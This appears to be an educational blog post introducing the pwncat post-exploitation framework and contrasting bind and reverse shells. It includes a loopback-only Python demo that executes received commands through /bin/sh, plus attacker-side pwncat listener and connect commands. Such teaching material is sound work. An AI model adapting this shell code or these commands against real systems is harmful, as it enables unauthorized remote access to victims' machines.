pwncat Basics

pwncat (installed from PyPI as pwncat-cs) is a post-exploitation and command and control framework that turns a basic reverse or bind shell into a fully featured exploitation platform.


The two basic modes of pwncat

  • Terminal (raw) mode: behaves like the plain shell you would get from a reverse or bind shell; whatever you type is sent straight to the target.
  • pwncat CLI (command-line interface) mode: the local pwncat prompt, where all the extra features pwncat offers (enumeration, file upload and download, privilege escalation, and so on) are available.
Ctrl + D switches between the two modes.

Establishing a bind shell

A bind shell is one in which the target (victim) machine opens a listening port and waits for an incoming connection. As soon as the attacker connects, the target executes /bin/bash on that connection, which gives the attacker a shell on the victim's machine. With pwncat you connect to a bind shell by pointing it at the target's address and port, exactly as you would with netcat.

Bind Shell Comparison

Establishing a reverse shell

A reverse shell is a shell session over a connection that the target initiates back to the attacker's machine, rather than one the attacker opens towards the target. Just like netcat, pwncat receives such connections with -lp, which means listen on the given port. The shell we obtain this way, however, has far more features than the ordinary shell netcat gives us.
Reverse Shell Comparison
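The difference between the two shells above is only who calls connect(): in a bind shell the target listens and the attacker connects, in a reverse shell the attacker listens and the target connects back. The following is an added example, not pwncat's own code: two tiny Python stand-ins run on loopback so that difference is visible, with the "target" executing each received line via /bin/sh and the "attacker" sending commands. The length-prefixed reply framing and the function names are this example's own; pwncat itself talks to the raw shell directly.

```python
"""Bind shell vs reverse shell, reduced to the socket level.

Added example, not pwncat's own code. Both roles run in one process on
loopback; only the direction of the TCP connection differs between the
two demos.
"""
import socket
import struct
import subprocess
import threading

HOST = "127.0.0.1"  # loopback only; a real bind shell on 0.0.0.0 is reachable by anyone


def serve_shell(conn: socket.socket) -> None:
    """Target side: run newline-terminated commands until 'exit' is received.

    Replies are framed as a 4-byte big-endian length followed by the output
    (framing chosen for this example, so the reader never has to guess where
    one command's output ends).
    """
    with conn, conn.makefile("rb") as rd:
        for line in rd:
            cmd = line.decode().strip()
            if cmd == "exit":
                break
            res = subprocess.run(cmd, shell=True, capture_output=True)
            out = res.stdout + res.stderr
            conn.sendall(struct.pack("!I", len(out)) + out)


def attacker_session(sock: socket.socket, commands: list[str]) -> list[str]:
    """Attacker side: send each command, collect its framed reply, then exit."""
    outputs = []
    with sock, sock.makefile("rb") as rd:
        for cmd in commands:
            sock.sendall(cmd.encode() + b"\n")
            (n,) = struct.unpack("!I", rd.read(4))
            outputs.append(rd.read(n).decode())
        sock.sendall(b"exit\n")
    return outputs


def demo_bind_shell(commands: list[str]) -> list[str]:
    """Bind shell: the TARGET listens, the ATTACKER connects.

    pwncat equivalent on the attacker side: pwncat-cs TARGET_IP:PORT
    """
    srv = socket.socket()
    srv.bind((HOST, 0))          # port 0: let the OS pick a free port for the demo
    srv.listen(1)
    port = srv.getsockname()[1]

    def target():
        conn, _ = srv.accept()   # victim waits here for the attacker
        srv.close()
        serve_shell(conn)

    t = threading.Thread(target=target, daemon=True)
    t.start()
    sock = socket.create_connection((HOST, port))   # attacker -> target
    result = attacker_session(sock, commands)
    t.join(5)
    return result


def demo_reverse_shell(commands: list[str]) -> list[str]:
    """Reverse shell: the ATTACKER listens, the TARGET connects back.

    pwncat equivalent on the attacker side: pwncat-cs -lp PORT
    """
    srv = socket.socket()
    srv.bind((HOST, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def target():
        conn = socket.create_connection((HOST, port))  # target -> attacker
        serve_shell(conn)

    t = threading.Thread(target=target, daemon=True)
    t.start()
    conn, _ = srv.accept()       # attacker waits here for the callback
    srv.close()
    result = attacker_session(conn, commands)
    t.join(5)
    return result


if __name__ == "__main__":
    cmds = ["echo hello from the target", "id"]
    print("bind   :", demo_bind_shell(cmds))
    print("reverse:", demo_reverse_shell(cmds))
```

Both demos return the same command output; what changes is which side is the server. That is also why a reverse shell is the usual choice in practice: the target only needs outbound connectivity to the attacker's listener, while a bind shell needs an inbound port on the victim to be reachable.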

All the usual connection types are possible via pwncat: connecting to a bind shell, listening for a reverse shell, and connecting to the target over SSH.

Connection Example
pwncat is a good tool in a CTF-like environment, but make sure you do not use it in exams like the OSCP: its automation capabilities, such as privilege escalation to other users with a single command and automatic enumeration, are prohibited under Offensive Security's exam rules. In a CTF, pwncat is a much better tool than netcat.
We hope this helps. If you have any suggestions or doubts, add a comment and we will reply as soon as possible.
